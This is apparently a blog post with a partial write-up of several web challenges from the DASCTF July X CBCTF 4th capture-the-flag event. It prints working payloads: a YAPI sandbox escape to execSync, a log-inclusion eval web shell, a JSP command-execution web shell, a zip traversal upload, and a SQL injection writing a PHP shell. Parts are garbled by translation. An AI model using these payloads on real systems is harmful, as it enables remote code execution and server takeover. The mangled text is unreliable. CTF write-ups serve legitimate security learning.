DASCTF July X CBCTF 4th web part WP

Posted by Snatch on Mon, 03 Jan 2022 06:24:19 +0100

DASCTF July X CBCTF 4th web part WP


Yapi remote command execution vulnerability

YAPI uses mock data / script as the intermediate interaction layer, in which mock data returns fixed content by setting fixed data. For the case that the response content needs to be customized according to the user's request, the mock script processes the user's request parameters and returns customized content by writing JS script. This vulnerability occurs in the mock script service. Since the mock script custom service does not filter the JS script, users can add any request processing script. Therefore, commands can be implanted in the script, and the command execution can be triggered when the user access interface initiates a request.

Global script

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()

Here, modify the parameters in the execSync function to get the flag


The source code given by the title is very short, but if you don't read the log file at the beginning, you can't get the flag


if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    if (!preg_match('/flag/i',$cmd))
        $cmd = escapeshellarg($cmd);
        system('cat ' . $cmd);
} else {

Through the plug-in wapalyzer, you can find that the server of this page is nginx. So cmd passes in cmd =.. /.. // var/log/nginx/access. log

Because of the escape hellarg function, you can pass fla%8ag around d the regular match here. At the same time, escape hellarg will filter out%8a this character

Read flag


Related vulnerability link: https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ

In order to avoid url encoding, grab the package with burpsuite, and then modify the url

First construct Payload: / index php? m=Home&c=Index&a=index&test=--> <?= phpinfo();?>

Construct attack request: / index php? m=Home&c=Index&a=index&value[_filename]=./ Application/Runtime/Logs/Home/21_ 08_ 01 . log

The test is successful. If phpinfo is written here, the Trojan horse can also be written in one sentence

Change Payload: / index php? m=Home&c=Index&a=index&test=--><?= eval($_POST[1]);?>, Continue to contract with burp and connect with ant sword


First log in to the background with the user name admin, log in without password, find the file management office and upload the file. Here, the uploaded compressed package is constructed according to this article

Remember the "unsafe decompression getshell" - Security guest, security information platform (anquanke.com) found by tracing the source

Create a compressed package with the following structure

After the file is uploaded and decompressed, it will cause directory traversal, which will jump out of the restrictions of spring context, and then access the malicious file

Paste a jsp Trojan horse

        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
            out.println(new String(b));
Request: shell.jsp?pwd=023&i=ls


Inject sql into the write shell through the login box, hit with the vulnerable exp, write the file successfully, and connect with the ant sword to get the flag under the root directory

See details https://www.cnblogs.com/yuzly/p/11423384.html

There are minor changes to this question
user=-1'/**/uni union on/**/selselectect/**/1,2,3,4,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e/**/into/**/outoutfilefile/**/'/var/www/html/shell.php'%23&password=123&code=&submit=true&submit.x=40&submit.y=51

Topics: PHP Java shell security unctf